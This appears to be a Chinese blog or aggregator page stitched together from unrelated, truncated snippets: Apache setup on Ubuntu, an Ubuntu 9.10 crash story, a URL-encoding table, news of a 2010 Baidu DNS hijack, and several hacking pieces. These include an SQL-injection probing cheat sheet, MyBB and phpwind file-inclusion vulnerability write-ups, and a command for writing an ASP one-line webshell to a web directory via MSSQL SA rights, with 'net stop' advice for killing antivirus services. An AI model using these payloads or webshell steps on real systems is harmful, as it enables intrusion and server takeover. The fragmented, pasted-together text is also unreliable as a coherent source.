在Windows下，Apache的配置文件通常只有一个，就是httpd.conf。但我在Ubuntu Linux上用apt-get install apache2命令安装了Apache2后，竟然发现它的httpd.conf（位于/etc/apache2目录）是空的！进而发现Ubuntu的 Apache软件包的配置文件并不像Windows的那样简单，它把各个设置项分在了不同的配置文件中，看起来复杂，

进天终于把ubuntu 9.10 桌面版安装上了,现在我就是用这个系统在写日志.

在装这个系统的时候碰到了很多问题,这里我还是给大家一个一个来讲吧.

ubuntu一直都以3D效果闻名,所以我在装好系统后就开启了 3D 特效,但是万万没有想到,就在开启"阴影"特效的同时,系统死机了 ...

强制关机,重启,一个效果,这下完了,难道让我再重新装一下系统?

百度了半天,中文论坛上搜了好久,也没有实质性的进展

ubuntu 9.10的 recovery模式  也没有 ifix选项.彻底郁闷.只好进入最后一个选项(root命令行)

...

附件一：URLUnicode表(节选,主要是非字母的字符，RFC1738)

backspace %08
tab %09
...

==============================================================================□ 检测可否注入==============================================================================http://url/xx?id=1111 and 1=1  

1.判断是否有注入
;and 1=1
;and 1=2

  2.初步判断是否是mssql
;and user>0

  3.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0access
...

今天早上7时许，百度出现访问中断的情况，查询域名baidu.com的WHOIS信息后发现百度域名出现不可理解的问题。
目前Baidu.com的DNS服务器被更换，同时主域名已经被解析到一个荷兰的IP，并且访问百度旗下子域名会被跳转到雅虎的错误页面，WHOIS数据也正在不断被刷新中，目前问题并未解决，百度也并没有对此发表回应。

8:20更新:有网友曾经被定向到一个黑页“Iranian Cyber Army”上，域名被盗取或劫持的可能性相当大，不过百度如此大的请求数量是任何一个黑页服务器也无法抵御的，因此只能是访问失败。
...

by flyh4t
team: http://www.80vul.com
date: 2010-01-10

测试版本MyBB 1.44.11

[一]漏洞分析

在index.php文件336行左右代码如下：

//index.php,336行左右

$plugins->run_hooks("index_end");
...

phpwind 7.5 Multiple Include Vulnerabilities

一.api/class_base.php本地包含漏洞

1.描叙

api/class_base.php文件里callback函数里$mode变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令.

2. 具体分析

api/class_base.php文件里:

function callback($mode, $method, $params) {
...

 SA权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家提出,技术越辩起明,越明越高。

一、NBSI的命令方法:写入一句话木SHELL,命令如下: echo ^<25%execute request("#")25%^> >d:\web\mm.asp这样要写入一句话木马,如果说被杀软,KILL掉,就可以连上去了。net stop "服务名"可以停掉服务。

...

昨天晚上。突然有人说phpwind报0day了！邪十已经被黑。discuz 的0day刚刚过去，phpwind就跟上来了。看来0day这东西也在即时更新啊！

这个0day貌似是邪八的人发现的，然后被徒弟利用了一下，现在好像没有公开，不过邪十被黑却是事实，昨天晚上忘记截图了，今天早晨开始维护了。